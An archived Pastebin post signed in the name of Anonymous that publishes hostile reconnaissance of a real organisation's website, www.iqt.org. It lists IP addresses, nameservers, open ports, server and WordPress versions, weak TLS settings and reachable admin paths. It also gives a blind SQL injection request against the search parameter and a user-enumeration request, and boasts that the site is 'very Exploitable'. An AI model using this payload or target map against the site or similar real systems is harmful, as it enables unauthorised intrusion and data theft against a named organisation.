"Exploitation/www.iqt.org" By Sneakyone12 (https://pastebin.com/u/Sneakyone12) URL: https://pastebin.com/w0q4NgNj Created on: Wednesday 29th of April 2015 09:51:41 AM CDT Retrieved on: Saturday 31 of October 2020 06:10:32 AM UTC We are Anonymous We are Legion We do not forgive We do not forget Expect us. Hacktivist's Forever. Pentest of iqt.org @ 65% / very Exploitable from every Angle . == https://www.iqt.org/ -- Non-authoritative answer: Name: www.iqt.org Address: 38.127.128.20 -- scan report for 38.127.128.20 Host is up (0.025s latency). PORT STATE SERVICE 80/tcp open http --/ Server Type: lighttpd/1.4.35 <<< Server exploit SQL Injection ) -- 38.127.128.20 0 site(s) hosted on ip 38.127.128.20 Location: Arlington,United States --- HTTP Headers for www.iqt.org ============== HTTP/1.1 301 Moved Permanently Location: https://www.iqt.org/ Connection: close Date: Wed, 29 Apr 2015 11:30:15 GMT Server: lighttpd/1.4.35 ----/ MD5 sum of host name: 5a6d285e45428841aefff0f8eca149e5 SHA1 sum of host name: 7060e392c2e06f76afc2bebe65dc290eb3d07052 SHA256 sum of host name: c43a6aae27757ec4b6ef6a9e51e2e1ba99a15217882febe9e0027132d306072b -- https://www.iqt.org/robots.txt # robots.txt -- Name Servers ============ ns1.iqt.org 38.103.36.99 - scan report for 38.103.36.99 Host is up (0.033s latency). PORT STATE SERVICE 53/tcp open domain 80/tcp open http -------------------------------- ns2.iqt.org 38.127.128.200 - scan report for ns1.iqt.org (38.127.128.200) Host is up (0.0059s latency). PORT STATE SERVICE 80/tcp open http -------------------------------- ns3.iqt.org 38.122.223.132 - scan report for 38.122.223.132 Host is up (0.0058s latency). PORT STATE SERVICE 80/tcp open http ------------------------------- www.iqt.org (38.127.128.202) Server:lighttpd/1.4.35 IP Address:38.127.128.202 Port:443 Hostname:www.iqt.org EXPLOITS: ========= The whole target has no protection (X-Frame-Options header) against ClickJacking attack --- Blind SQL injection was found at: "https://www.iqt.org/", using HTTP method GET. The injectable parameter is: "s". GET https://www.iqt.org/?s=95"%20OR%20"95"="95&searchsubmit-mobile=Hello%20World HTTP/1.1 Host: www.iqt.org --- The target site *has* a DNS wildcard configuration. --- X-Powered-By" header for this HTTP server is: "PHP/5.3.21". --- The URL "https://www.iqt.org/" has the following allowed methods, which include DAV methods: ACL, CHECKIN, CHECKOUT, CONNECT, COPY, GET, HEAD, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKWORKSPACE, MOVE, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SEARCH, TRACE, UNCHECKOUT, UNLINK, UNLOCK. --- https://www.iqt.org/wp-login.php WordPress version "2.7.1" found from data GET https://www.iqt.org/wp-includes/js/thickbox/thickbox.css HTTP/1.1 Host: www.iqt.org Cookie: wordpress_test_cookie=WP+Cookie+check --- WordPress user "500" found from enumeration. GET https://www.iqt.org/?author=2 HTTP/1.1 Host: www.iqt.org Cookie: wordpress_test_cookie=WP+Cookie+check ---google -- Server configuration contains weak cipher suites Cipher suites with known weaknesses should be disabled - Server may have sent unnecessary certificates in the SSL/TLS negotiation Users may experience slower performance - Server uses RC4 cipher with modern browsers More secure ciphers are available for TLS 1.1 and newer - Server is using RC4-based ciphersuites which have known vulnerabilities Evaluate your client compatibility requirements to determine if you can disable RC4-based ciphersuites - Server configuration does not meet FIPS guidelines Federal standards for data handling are not being met - SSL Configuration: ================= SSL 3.0 Disabled:Fail - Weak ciphersuites disabled:Fail - OCSP Stapling:Fail - PCI Compliant:Fail - FIPS Compliant:Fail Certificate Chain Tests: ======================= Unnecessary Certificates in Chain:Fail HTTP Tests: =========== Domain name resolves to IPv6 address:Fail ----------------------------------------------------------------------------------------------- File check: ========== URL: https://www.iqt.org/admin/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/administrator/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/board/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/ccms/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/community/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/faqman/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/livredor/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/modules/Search/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/php/gaestebuch/admin/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/php/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/robots.txt | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/search/htx/sqlqhit.asp | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/search/htx/SQLQHit.asp | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/search/SQLQHit.asp | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/search/sqlqhit.asp | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/staticpages/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/supporter/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/ttforum/index.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/wp-content/plugins/akismet/readme.txt | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/xmlrpc.php | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/zentrack/index.php ====================================================================== Directory check: | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/feed/ | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/home/ | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/news/ | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/rss/ ====================================================================== Deep in the Matrix you will find us " watching you 'watching us'watching you" Big ups to the Anonymous Family WorldWide <3